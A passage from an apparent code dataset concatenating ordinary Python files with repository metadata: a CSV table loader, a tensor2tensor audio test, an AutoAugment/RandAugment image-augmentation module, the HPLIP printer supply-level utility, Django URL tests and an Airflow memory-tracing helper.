:rtype: |TableData| iterator
:raises pytablereader.DataError:
If the CSV data is invalid.
.. seealso::
:py:func:`csv.reader`
"""
self._validate()
self._logger.logging_load()
self.encoding = get_file_encoding(self.source, self.encoding)
self._csv_reader = csv.reader(
open(self.source, encoding=self.encoding),
delimiter=self.delimiter,
quotechar=self.quotechar,
strict=True,
skipinitialspace=True,
)
formatter = CsvTableFormatter(self._to_data_matrix())
formatter.accept(self)
return formatter.to_table_data()
def _get_default_table_name_template(self):
return tnt.FILENAME
class CsvTableTextLoader(CsvTableLoader):
"""
A text loader class to extract tabular data from CSV text data.
:param str text: CSV text to load.
.. py:attribute:: table_name
Table name string. Defaults to ``%(format_name)s%(format_id)s``.
:Examples:
:ref:`example-csv-table-loader`
"""
def __init__(self, text, quoting_flags=None, type_hints=None, type_hint_rules=None):
super().__init__(text, quoting_flags, type_hints, type_hint_rules)
self._validator = TextValidator(text)
self._logger = TextSourceLogger(self)
def load(self):
"""
Extract tabular data as |TableData| instances from a CSV text object.
|load_source_desc_text|
:return:
Loaded table data.
|load_table_name_desc|
=================== ========================================
Format specifier Value after the replacement
=================== ========================================
``%(filename)s`` ``""``
``%(format_name)s`` ``"csv"``
``%(format_id)s`` |format_id_desc|
``%(global_id)s`` |global_id|
=================== ========================================
:rtype: |TableData| iterator
:raises pytablereader.DataError:
If the CSV data is invalid.
.. seealso::
:py:func:`csv.reader`
"""
self._validate()
self._logger.logging_load()
self._csv_reader = csv.reader(
io.StringIO(self.source.strip()),
delimiter=self.delimiter,
quotechar=self.quotechar,
strict=True,
skipinitialspace=True,
)
formatter = CsvTableFormatter(self._to_data_matrix())
formatter.accept(self)
return formatter.to_table_data()
def _get_default_table_name_template(self):
return f"{tnt.FORMAT_NAME:s}{tnt.FORMAT_ID:s}"
| 29.760504
| 93
| 0.585486
|
ff94e44306b17bcfe72a1f62095067b676385cae
| 1,932
|
py
|
Python
|
tensor2tensor/data_generators/audio_test.py
|
SamuelmsWong/tensor2tensor
|
7172ad8dc5f1d8f8c0e21cbb831ae2657387a2af
|
[
"Apache-2.0"
] | 3
|
2021-01-19T20:21:15.000Z
|
2021-01-19T21:36:37.000Z
|
tensor2tensor/data_generators/audio_test.py
|
SamuelmsWong/tensor2tensor
|
7172ad8dc5f1d8f8c0e21cbb831ae2657387a2af
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/data_generators/audio_test.py
|
SamuelmsWong/tensor2tensor
|
7172ad8dc5f1d8f8c0e21cbb831ae2657387a2af
|
[
"Apache-2.0"
] | 1
|
2021-05-03T17:34:21.000Z
|
2021-05-03T17:34:21.000Z
|
# coding=utf-8
# Copyright 2020 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensor2tensor.data_generators.audio."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import io
import os
from tensor2tensor.data_generators import audio
import tensorflow.compat.v1 as tf
class AudioTest(tf.test.TestCase):
def testDataCollection(self):
# Generate a trivial source and target file.
tmp_dir = self.get_temp_dir()
test_files = [
"dir1/file1",
"dir1/file2",
"dir1/dir2/file3",
"dir1/dir2/dir3/file4",
]
for filename in test_files:
input_filename = os.path.join(tmp_dir, filename + ".WAV")
target_filename = os.path.join(tmp_dir, filename + ".WRD")
directories = os.path.dirname(input_filename)
if not os.path.exists(directories):
os.makedirs(directories)
io.open(input_filename, "wb")
io.open(target_filename, "wb")
data_dict = audio._collect_data(tmp_dir, ".WAV", ".WRD")
expected = [os.path.join(tmp_dir, filename) for filename in test_files]
self.assertEqual(sorted(list(data_dict)), sorted(expected))
# Clean up.
for filename in test_files:
os.remove(os.path.join(tmp_dir, "%s.WAV" % filename))
os.remove(os.path.join(tmp_dir, "%s.WRD" % filename))
if __name__ == "__main__":
tf.test.main()
| 31.672131
| 75
| 0.710145
|
5aee13bb4438e8b32d22316f5acb1ec9332c9fbf
| 19,233
|
py
|
Python
|
autoaugment.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 77
|
2021-04-03T06:44:19.000Z
|
2021-07-07T07:05:01.000Z
|
autoaugment.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 1
|
2021-04-08T06:59:41.000Z
|
2021-04-08T11:20:32.000Z
|
autoaugment.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 6
|
2021-04-15T13:36:37.000Z
|
2022-02-03T12:32:20.000Z
|
import random
import math
import torch
from PIL import Image, ImageOps, ImageEnhance, ImageDraw
from torchvision.transforms import functional as F
import transforms
from transforms import check_prob, PIL_INTER_MAP, RandomTransform
def rescale_float(level, max_val, param_max=10):
return float(level) * max_val / param_max
def rescale_int(level, max_val, param_max=10):
return int(level * max_val / param_max)
def random_mirror(mirror, val):
if mirror and check_prob(0.5):
val *= -1
return val
def apply_affine(img, translate, shear, resample, fillcolor):
trans_x, trans_y = translate
shear_x, shear_y = shear
return img.transform(
img.size,
Image.AFFINE,
(1, shear_x, trans_x, shear_y, 1, trans_y),
resample,
fillcolor=fillcolor,
)
class AutoAugmentAffine(RandomTransform):
def __init__(self, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0):
super().__init__(p)
self.mirror = mirror
self.resample = resample
self.fillcolor = fillcolor
def _mirror(self, val):
if self.mirror and check_prob(0.5):
val *= -1
return val
def _repr_params(self):
params = dict(self.__dict__)
params["resample"] = PIL_INTER_MAP[self.resample]
return params
def _apply_img_fn(self, img, translate, shear):
trans_x, trans_y = translate
shear_x, shear_y = shear
return img.transform(
img.size,
Image.AFFINE,
(1, shear_x, trans_x, shear_y, 1, trans_y),
self.resample,
fillcolor=self.fillcolor,
)
def shear_x(img, shear_x, mirror=True, resample=Image.NEAREST, fillcolor=None):
shear_x = random_mirror(mirror, shear_x)
return apply_affine(img, (0, 0), (shear_x, 0), resample, fillcolor)
return F.affine(
img,
angle=0.0,
translate=(0, 0),
scale=1.0,
shear=(math.degrees(shear_x), 0.0),
resample=resample,
fillcolor=fillcolor,
)
def shear_y(img, shear_y, mirror=True, resample=Image.NEAREST, fillcolor=None):
shear_y = random_mirror(mirror, shear_y)
return apply_affine(img, (0, 0), (0, shear_y), resample, fillcolor)
return F.affine(
img,
angle=0.0,
translate=(0, 0),
scale=1.0,
shear=(0, math.degrees(shear_y)),
resample=resample,
fillcolor=fillcolor,
)
def translate_x(img, translate_x, mirror=True, resample=Image.NEAREST, fillcolor=None):
translate_x = random_mirror(mirror, translate_x)
return apply_affine(img, (translate_x, 0), (0, 0), resample, fillcolor)
return F.affine(
img,
angle=0.0,
translate=(translate_x, 0),
scale=1.0,
shear=(0, 0),
resample=resample,
fillcolor=fillcolor,
)
def translate_y(img, translate_y, mirror=True, resample=Image.NEAREST, fillcolor=None):
translate_y = random_mirror(mirror, translate_y)
return apply_affine(img, (0, translate_y), (0, 0), resample, fillcolor)
return F.affine(
img,
angle=0.0,
translate=(0, translate_y),
scale=1.0,
shear=(0, 0),
resample=resample,
fillcolor=fillcolor,
)
def rotate(img, rotate, mirror=True, resample=Image.NEAREST, fillcolor=None):
rotate = random_mirror(mirror, rotate)
return img.rotate(rotate, resample=resample, fillcolor=fillcolor)
return F.rotate(img, rotate, resample=resample, fillcolor=fillcolor)
def posterize(img, bits):
return ImageOps.posterize(img, bits)
return F.posterize(img, bits)
def cutout(img, size, fillcolor=None):
if isinstance(img, torch.Tensor):
pass
else:
x = random.random()
y = random.random()
w, h = img.size
c_x = int(x * w)
c_y = int(y * h)
x0 = max(0, c_x - size)
x1 = w - max(0, w - c_x - size) - 1
y0 = max(0, c_y - size)
y1 = h - max(0, h - c_y - size) - 1
xy = (x0, y0, x1, y1)
img = img.copy()
ImageDraw.Draw(img).rectangle(xy, fillcolor)
return img
def solarize(img, threshold):
return ImageOps.solarize(img, threshold)
return F.posterize(img, solarize)
def solarize_add(img, add, threshold=128):
if isinstance(img, torch.Tensor):
mask = img < threshold
solarized = img.clamp(max=255 - add) + add
result = mask * solarized + ~mask * img
return result
else:
lut = []
for i in range(256):
if i < threshold:
lut.append(min(255, i + add))
else:
lut.append(i)
if img.mode in ("L", "RGB"):
if img.mode == "RGB" and len(lut) == 256:
lut = lut + lut + lut
return img.point(lut)
else:
return img
def saturation(img, saturate):
return ImageEnhance.Color(img).enhance(saturate)
return F.adjust_saturation(img, saturate_value)
def contrast(img, contrast):
return ImageEnhance.Contrast(img).enhance(contrast)
return F.adjust_contrast(img, contrast)
def brightness(img, brightness):
return ImageEnhance.Brightness(img).enhance(brightness)
return F.adjust_brightness(img, brightness)
def sharpness(img, sharpness):
return ImageEnhance.Sharpness(img).enhance(sharpness)
return F.adjust_sharpness(img, sharpness)
def invert(img):
return ImageOps.invert(img)
return F.invert(img)
def auto_contrast(img):
return ImageOps.autocontrast(img)
return F.autocontrast(img)
def equalize(img):
return ImageOps.equalize(img)
return F.equalize(img)
class ShearX(AutoAugmentAffine):
def __init__(
self, shear_x, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.shear_x = shear_x
def sample(self):
shear_x = self._mirror(self.shear_x)
return {"shear_x": shear_x}
def _apply_img(self, img, shear_x):
return self._apply_img_fn(img, (0, 0), (shear_x, 0))
class ShearY(AutoAugmentAffine):
def __init__(
self, shear_y, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.shear_y = shear_y
def sample(self):
shear_y = self._mirror(self.shear_y)
return {"shear_y": shear_y}
def _apply_img(self, img, shear_y):
return self._apply_img_fn(img, (0, 0), (0, shear_y))
class TranslateX(AutoAugmentAffine):
def __init__(
self, translate_x, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.translate_x = translate_x
def sample(self):
trans_x = self._mirror(self.translate_x)
return {"translate_x": trans_x}
def _apply_img(self, img, translate_x):
return self._apply_img_fn(img, (translate_x, 0), (0, 0))
class TranslateY(AutoAugmentAffine):
def __init__(
self, translate_y, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.translate_y = translate_y
def sample(self):
trans_y = self._mirror(self.translate_y)
return {"translate_y": trans_y}
def _apply_img(self, img, translate_y):
return self._apply_img_fn(img, (0, translate_y), (0, 0))
class Rotate(AutoAugmentAffine):
def __init__(
self, rotate, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.rotate = rotate
def sample(self):
rotate = self._mirror(self.rotate)
return {"rotate": rotate}
def _apply_img(self, img, rotate):
return img.rotate(rotate, resample=self.resample, fillcolor=self.fillcolor)
class Posterize(RandomTransform):
def __init__(self, bits, p=1.0):
super().__init__(p)
self.bits = bits
def sample(self):
return {"bits": self.bits}
def _apply_img(self, img, bits):
return ImageOps.posterize(img, bits)
class Cutout(RandomTransform):
def __init__(self, size, fillcolor=(0, 0, 0), p=1.0):
super().__init__(p)
self.size = size
self.fillcolor = fillcolor
def sample(self):
x = random.random()
y = random.random()
return {"center": (x, y)}
def _apply_img(self, img, center):
w, h = img.size
c_x = int(center[0] * w)
c_y = int(center[1] * h)
x0 = max(0, c_x - self.size)
x1 = w - max(0, w - c_x - self.size) - 1
y0 = max(0, c_y - self.size)
y1 = h - max(0, h - c_y - self.size) - 1
xy = (x0, y0, x1, y1)
img = img.copy()
ImageDraw.Draw(img).rectangle(xy, self.fillcolor)
return img
class Solarize(RandomTransform):
def __init__(self, threshold, p=1.0):
super().__init__(p)
self.threshold = threshold
def sample(self):
return {"threshold": self.threshold}
def _apply_img(self, img, threshold):
return ImageOps.solarize(img, threshold)
class SolarizeAdd(RandomTransform):
def __init__(self, add, threshold=128, p=1.0):
super().__init__(p)
self.add = add
self.threshold = threshold
def sample(self):
return {"add": self.add, "threshold": self.threshold}
def _apply_img(self, img, add, threshold):
return solarize_add(img, add, threshold)
class Saturation(RandomTransform):
def __init__(self, saturation, p=1.0):
super().__init__(p)
self.saturation = saturation
def sample(self):
return {"saturation": self.saturation}
def _apply_img(self, img, saturation):
return ImageEnhance.Color(img).enhance(saturation)
class Contrast(RandomTransform):
def __init__(self, contrast, p=1.0):
super().__init__(p)
self.contrast = contrast
def sample(self):
return {"contrast": self.contrast}
def _apply_img(self, img, contrast):
return ImageEnhance.Contrast(img).enhance(contrast)
class Brightness(RandomTransform):
def __init__(self, brightness, p=1.0):
super().__init__(p)
self.brightness = brightness
def sample(self):
return {"brightness": self.brightness}
def _apply_img(self, img, brightness):
return ImageEnhance.Brightness(img).enhance(brightness)
class Sharpness(RandomTransform):
def __init__(self, sharpness, p=1.0):
super().__init__(p)
self.sharpness = sharpness
def sample(self):
return {"sharpness": self.sharpness}
def _apply_img(self, img, sharpness):
return ImageEnhance.Sharpness(img).enhance(sharpness)
def reparam_shear(level):
return rescale_float(level, 0.3)
def reparam_translate(level, max_translate):
return rescale_int(level, max_translate)
def reparam_rotate(level):
return rescale_int(level, 30)
def reparam_solarize(level):
return rescale_int(level, 256)
def reparam_solarize_increasing(level):
return 256 - rescale_int(level, 256)
def reparam_posterize(level):
return rescale_int(level, 4)
def reparam_posterize_increasing(level):
return 4 - rescale_int(level, 4)
def reparam_color(level):
return rescale_float(level, 1.8) + 0.1
def reparam_cutout(level, cutout):
return rescale_int(level, cutout)
def reparam_solarize_add(level):
return rescale_int(level, 110)
AUTOAUGMENT_MAP = {
"ShearX": (ShearX, shear_x, reparam_shear),
"ShearY": (ShearY, shear_y, reparam_shear),
"TranslateX": (TranslateX, translate_x, reparam_translate),
"TranslateY": (TranslateY, translate_y, reparam_translate),
"Rotate": (Rotate, rotate, reparam_rotate),
"Solarize": (Solarize, solarize, reparam_solarize),
"SolarizeIncreasing": (Solarize, solarize, reparam_solarize_increasing),
"Posterize": (Posterize, posterize, reparam_posterize),
"PosterizeIncreasing": (Posterize, posterize, reparam_posterize_increasing),
"Contrast": (Contrast, contrast, reparam_color),
"Color": (Saturation, saturation, reparam_color),
"Brightness": (Brightness, brightness, reparam_color),
"Sharpness": (Sharpness, sharpness, reparam_color),
"Invert": (transforms.Invert, invert, None),
"AutoContrast": (transforms.AutoContrast, auto_contrast, None),
"Equalize": (transforms.Equalize, equalize, None),
"Cutout": (Cutout, cutout, reparam_cutout),
"SolarizeAdd": (SolarizeAdd, solarize_add, reparam_solarize_add),
}
def autoaugment_policy():
policy_list = [
[("PosterizeIncreasing", 0.4, 8), ("Rotate", 0.6, 9)],
[("SolarizeIncreasing", 0.6, 5), ("AutoContrast", 0.6, 5)],
[("Equalize", 0.8, 8), ("Equalize", 0.6, 3)],
[("PosterizeIncreasing", 0.6, 7), ("PosterizeIncreasing", 0.6, 6)],
[("Equalize", 0.4, 7), ("SolarizeIncreasing", 0.2, 4)],
[("Equalize", 0.4, 4), ("Rotate", 0.8, 8)],
[("SolarizeIncreasing", 0.6, 3), ("Equalize", 0.6, 7)],
[("PosterizeIncreasing", 0.8, 5), ("Equalize", 1.0, 2)],
[("Rotate", 0.2, 3), ("SolarizeIncreasing", 0.6, 8)],
[("Equalize", 0.6, 8), ("PosterizeIncreasing", 0.4, 6)],
[("Rotate", 0.8, 8), ("Color", 0.4, 0)],
[("Rotate", 0.4, 9), ("Equalize", 0.6, 2)],
[("Equalize", 0.0, 7), ("Equalize", 0.8, 8)],
[("Invert", 0.6, 4), ("Equalize", 1.0, 8)],
[("Color", 0.6, 4), ("Contrast", 1.0, 8)],
[("Rotate", 0.8, 8), ("Color", 1.0, 0)],
[("Color", 0.8, 8), ("SolarizeIncreasing", 0.8, 7)],
[("Sharpness", 0.4, 7), ("Invert", 0.6, 8)],
[("ShearX", 0.6, 5), ("Equalize", 1.0, 9)],
[("Color", 0.4, 0), ("Equalize", 0.6, 3)],
[("Equalize", 0.4, 7), ("SolarizeIncreasing", 0.2, 4)],
[("SolarizeIncreasing", 0.6, 5), ("AutoContrast", 0.6, 5)],
[("Invert", 0.6, 4), ("Equalize", 1.0, 8)],
[("Color", 0.6, 4), ("Contrast", 1.0, 8)],
[("Equalize", 0.8, 8), ("Equalize", 0.6, 3)],
]
reparam_policy = []
for policy in policy_list:
sub_pol = []
for pol in policy:
augment, prob, magnitude = pol
augment_fn, _, reparam_fn = AUTOAUGMENT_MAP[augment]
if reparam_fn is not None:
magnitude = reparam_fn(magnitude)
sub_pol.append(augment_fn(magnitude, p=prob))
else:
sub_pol.append(augment_fn(p=prob))
reparam_policy.append(sub_pol)
return reparam_policy
class AutoAugment:
def __init__(self, policy):
self.policy = policy
def __call__(self, img):
selected_policy = random.choice(self.policy)
for pol in selected_policy:
sample = pol.sample()
img = pol.apply_img(img, **sample)
return img
def __repr__(self):
return f"{self.__class__.__name__}(\n{self.policy}\n)"
def check(self, img):
log = []
selected_policy = random.choice(self.policy)
for pol in selected_policy:
sample = pol.sample()
img, check = pol.apply_img_check(img, **sample)
log.append((pol, sample, check))
return img, log
class RandAugment:
def __init__(
self,
n_augment,
magnitude,
translate=100,
cutout=40,
fillcolor=(128, 128, 128),
increasing=False,
magnitude_std=0,
):
self.n_augment = n_augment
self.magnitude = magnitude
self.translate = translate
self.fillcolor = fillcolor
self.magnitude_std = magnitude_std
# fmt: off
if increasing:
augment_list = [
"AutoContrast", "Equalize", "Invert", "Rotate",
"PosterizeIncreasing", "SolarizeIncreasing",
"Color", "Contrast", "Brightness", "Sharpness", "ShearX",
"ShearY", "TranslateX", "TranslateY", "Cutout", "SolarizeAdd",
]
else:
augment_list = [
"AutoContrast", "Equalize", "Invert", "Rotate", "Posterize", "Solarize",
"Color", "Contrast", "Brightness", "Sharpness", "ShearX",
"ShearY", "TranslateX", "TranslateY", "Cutout", "SolarizeAdd",
]
# fmt: on
if cutout == 0:
augment_list.remove("Cutout")
self.cutout = cutout
self.translate = translate
self.fillcolor = fillcolor
self.augment = []
for augment in augment_list:
_, augment_fn, reparam_fn = AUTOAUGMENT_MAP[augment]
reparam_fn_param = {}
augment_fn_param = {}
if reparam_fn is not None:
if augment in ("TranslateX", "TranslateY"):
reparam_fn_param = {"max_translate": translate}
elif augment == "Cutout":
reparam_fn_param = {"cutout": cutout}
if augment in (
"TranslateX",
"TranslateY",
"ShearX",
"ShearY",
"Rotate",
"Cutout",
):
augment_fn_param = {"fillcolor": fillcolor}
self.augment.append(
(augment_fn, reparam_fn, augment_fn_param, reparam_fn_param)
)
def __repr__(self):
return (
f"{self.__class__.__name__}(n_augment={self.n_augment}, magnitude={self.magnitude}, cutout={self.cutout},"
f" translate={self.translate}, fillcolor={self.fillcolor})"
)
def __call__(self, img):
augments = random.choices(self.augment, k=self.n_augment)
for augment, mag_fn, aug_param, reparam_param in augments:
if mag_fn is not None:
if self.magnitude_std > 0:
mag = random.normalvariate(self.magnitude, self.magnitude_std)
else:
mag = self.magnitude
mag = mag_fn(mag, **reparam_param)
img = augment(img, mag, **aug_param)
else:
img = augment(img, **aug_param)
return img
| 28.325479
| 119
| 0.578901
|
fc4b200914fc5b2f27202d342d2a2b0c08caa342
| 7,020
|
py
|
Python
|
hplip-3.20.3/levels.py
|
Deril-Pana/wikiBlackcoinNL
|
9633307f0b485c27feae5da242944adf450e8963
|
[
"MIT"
] | null | null | null |
hplip-3.20.3/levels.py
|
Deril-Pana/wikiBlackcoinNL
|
9633307f0b485c27feae5da242944adf450e8963
|
[
"MIT"
] | 1
|
2021-11-20T16:33:39.000Z
|
2021-11-20T16:33:39.000Z
|
hplip-3.20.3/levels.py
|
Deril-Pana/wikiBlackcoinNL
|
9633307f0b485c27feae5da242944adf450e8963
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (c) Copyright 2003-2015 HP Development Company, L.P.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Author: Don Welch
#
__version__ = '2.0'
__title__ = 'Supply Levels Utility'
__mod__ = 'hp-levels'
__doc__ = "Display bar graphs of current supply levels for supported HPLIP printers."
# Std Lib
import sys
import getopt
import time
import operator
import os
# Local
from base.g import *
from base import device, status, utils, tui, module
from prnt import cups
DEFAULT_BAR_GRAPH_SIZE = 8*(tui.ttysize()[1])/10
def logBarGraph(agent_level, agent_type, size=DEFAULT_BAR_GRAPH_SIZE, use_colors=True, bar_char='/'):
#print agent_level, agent_type, size, use_colors, bar_char
adj = 100.0/size
if adj==0.0: adj=100.0
bar = int(agent_level/adj)
size = int(size)
if bar > (size-2): bar = size-2
if use_colors:
if agent_type in (AGENT_TYPE_CMY, AGENT_TYPE_KCM, AGENT_TYPE_CYAN, AGENT_TYPE_CYAN_LOW):
log.info(log.codes['teal'])
elif agent_type in (AGENT_TYPE_MAGENTA, AGENT_TYPE_MAGENTA_LOW):
log.info(log.codes['fuscia'])
elif agent_type in (AGENT_TYPE_YELLOW, AGENT_TYPE_YELLOW_LOW):
log.info(log.codes['yellow'])
elif agent_type == AGENT_TYPE_BLUE:
log.info(log.codes['blue'])
elif agent_type in (AGENT_TYPE_BLACK, AGENT_TYPE_BLACK_B8800):
log.info(log.codes['bold'])
elif agent_type in (AGENT_TYPE_LG, AGENT_TYPE_G, AGENT_TYPE_PG):
pass
color = ''
if use_colors:
if agent_type in (AGENT_TYPE_CMY, AGENT_TYPE_KCM):
color = log.codes['fuscia']
log.info(("-"*(size))+color)
color = ''
if use_colors:
if agent_type in (AGENT_TYPE_CMY, AGENT_TYPE_KCM):
color = log.codes['yellow']
log.info("%s%s%s%s (approx. %d%%)%s" % ("|", bar_char*bar,
" "*((size)-bar-2), "|", agent_level, color))
color = ''
if use_colors:
color = log.codes['reset']
log.info(("-"*int(size))+color)
#log.info(("-"*(size))+color)
log.set_module('hp-levels')
try:
mod = module.Module(__mod__, __title__, __version__, __doc__, None,
(INTERACTIVE_MODE,))
mod.setUsage(module.USAGE_FLAG_DEVICE_ARGS,
extra_options=[
("Bar graph size:", "-s<size> or --size=<size> (current default=%d)" % DEFAULT_BAR_GRAPH_SIZE, "option", False),
("Use colored bar graphs:", "-c or --color (default is colorized)", "option", False),
("Bar graph character:", "-a<char> or --char=<char> (default is '/')", "option", False)])
opts, device_uri, printer_name, mode, ui_toolkit, lang = \
mod.parseStdOpts('s:ca:', ['size=', 'color', 'char='])
device_uri = mod.getDeviceUri(device_uri, printer_name)
if not device_uri:
sys.exit(1)
log.info("Using device : %s\n" % device_uri)
size = DEFAULT_BAR_GRAPH_SIZE
color = True
bar_char = '/'
for o, a in opts:
if o in ('-s', '--size'):
try:
size = int(a.strip())
except (TypeError, ValueError):
log.warn("Invalid size specified. Using the default of %d" % DEFAULT_BAR_GRAPH_SIZE)
size = DEFAULT_BAR_GRAPH_SIZE
if size < 1 or size > DEFAULT_BAR_GRAPH_SIZE:
log.warn("Invalid size specified. Using the default of %d" % DEFAULT_BAR_GRAPH_SIZE)
size = DEFAULT_BAR_GRAPH_SIZE
elif o in ('-c', '--color'):
color = True
elif o in ('-a', '--char'):
try:
bar_char = a[0]
except KeyError:
bar_char = '/'
try:
d = device.Device(device_uri, printer_name)
except Error:
log.error("Error opening device. Exiting.")
sys.exit(1)
try:
try:
d.open()
d.queryDevice()
except Error as e:
log.error("Error opening device (%s). Exiting." % e.msg)
sys.exit(1)
if d.mq['status-type'] != STATUS_TYPE_NONE:
log.info("")
sorted_supplies = []
a = 1
while True:
try:
agent_type = int(d.dq['agent%d-type' % a])
agent_kind = int(d.dq['agent%d-kind' % a])
agent_sku = d.dq['agent%d-sku' % a]
log.debug("%d: agent_type %d agent_kind %d agent_sku '%s'" % (a, agent_type, agent_kind, agent_sku))
except KeyError:
break
else:
sorted_supplies.append((a, agent_kind, agent_type, agent_sku))
a += 1
sorted_supplies.sort(key=utils.cmp_to_key(utils.levelsCmp))
for x in sorted_supplies:
a, agent_kind, agent_type, agent_sku = x
agent_health = d.dq['agent%d-health' % a]
agent_level = d.dq['agent%d-level' % a]
agent_desc = d.dq['agent%d-desc' % a]
agent_health_desc = d.dq['agent%d-health-desc' % a]
if agent_health in (AGENT_HEALTH_OK, AGENT_HEALTH_UNKNOWN) and \
agent_kind in (AGENT_KIND_SUPPLY,
AGENT_KIND_HEAD_AND_SUPPLY,
AGENT_KIND_TONER_CARTRIDGE,
AGENT_KIND_MAINT_KIT,
AGENT_KIND_ADF_KIT,
AGENT_KIND_INT_BATTERY,
AGENT_KIND_DRUM_KIT,):
log.info(log.bold(agent_desc))
log.info("Part No.: %s" % agent_sku)
log.info("Health: %s" % agent_health_desc)
logBarGraph(agent_level, agent_type, size, color, bar_char)
log.info("")
else:
log.info(log.bold(agent_desc))
log.info("Part No.: %s" % agent_sku)
log.info("Health: %s" % agent_health_desc)
log.info("")
else:
log.error("Status not supported for selected device.")
sys.exit(1)
finally:
d.close()
except KeyboardInterrupt:
log.error("User exit")
log.info("")
log.info("Done.")
| 33.270142
| 120
| 0.569088
|
5732f4a8ad70e684c865c19dac06c365c19865af
| 660
|
py
|
Python
|
portxpress/users/tests/test_urls.py
|
zoeinola/PortXpress
|
c69d9071e36a87942c3bba63a3ef079d06fe7baf
|
[
"MIT"
] | null | null | null |
portxpress/users/tests/test_urls.py
|
zoeinola/PortXpress
|
c69d9071e36a87942c3bba63a3ef079d06fe7baf
|
[
"MIT"
] | null | null | null |
portxpress/users/tests/test_urls.py
|
zoeinola/PortXpress
|
c69d9071e36a87942c3bba63a3ef079d06fe7baf
|
[
"MIT"
] | null | null | null |
import pytest
from django.urls import resolve, reverse
from portxpress.users.models import User
pytestmark = pytest.mark.django_db
def test_detail(user: User):
assert (
reverse("users:detail", kwargs={"username": user.username})
== f"/users/{user.username}/"
)
assert resolve(f"/users/{user.username}/").view_name == "users:detail"
def test_update():
assert reverse("users:update") == "/users/~update/"
assert resolve("/users/~update/").view_name == "users:update"
def test_redirect():
assert reverse("users:redirect") == "/users/~redirect/"
assert resolve("/users/~redirect/").view_name == "users:redirect"
| 26.4
| 74
| 0.677273
|
ba3576e3933e8a81e662bbb41c57c494fb0e2401
| 2,467
|
py
|
Python
|
scripts/perf/perf_kit/memory.py
|
troywinter/airflow
|
ba66ba0d97941c55d9f00f66329a9d3c7ad673e7
|
[
"Apache-2.0"
] | 3
|
2015-08-25T13:56:44.000Z
|
2020-03-21T10:26:58.000Z
|
scripts/perf/perf_kit/memory.py
|
troywinter/airflow
|
ba66ba0d97941c55d9f00f66329a9d3c7ad673e7
|
[
"Apache-2.0"
] | 37
|
2020-07-21T07:50:02.000Z
|
2022-03-29T22:31:28.000Z
|
scripts/perf/perf_kit/memory.py
|
vuppalli/airflow
|
dfe8337ca2d3ed173d9ecc112938271519792c40
|
[
"Apache-2.0"
] | 4
|
2020-07-17T14:02:28.000Z
|
2022-02-23T04:29:58.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import gc
import os
from contextlib import contextmanager
import psutil
def _get_process_memory():
process = psutil.Process(os.getpid())
return process.memory_info().rss
def _human_readable_size(size, decimal_places=3):
for unit in ["B", "KiB", "MiB", "GiB", "TiB"]:
if size < 1024.0:
break
size /= 1024.0
return f"{size:.{decimal_places}f}{unit}"
class TraceMemoryResult:
def __init__(self):
self.before = 0
self.after = 0
self.value = 0
@contextmanager
def trace_memory(human_readable=True, gc_collect=False):
"""
Calculates the amount of difference in free memory before and after script execution.
In other words, how much data the code snippet has used up memory.
:param human_readable: If yes, the result will be displayed in human readable units.
If no, the result will be displayed as bytes.
:param gc_collect: If yes, the garbage collector will be started before checking used memory.
"""
if gc_collect:
gc.collect()
before = _get_process_memory()
result = TraceMemoryResult()
try:
yield result
finally:
if gc_collect:
gc.collect()
after = _get_process_memory()
diff = after - before
result.before = before
result.after = after
result.value = diff
if human_readable:
human_diff = _human_readable_size(diff)
print(f"Memory: {human_diff}")
else:
print(f"Memory: {diff} bytes")
if __name__ == "__main__":
# Example:
with trace_memory():
import airflow # noqa # pylint: disable=unused-import
| 29.722892
| 97
| 0.679773
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.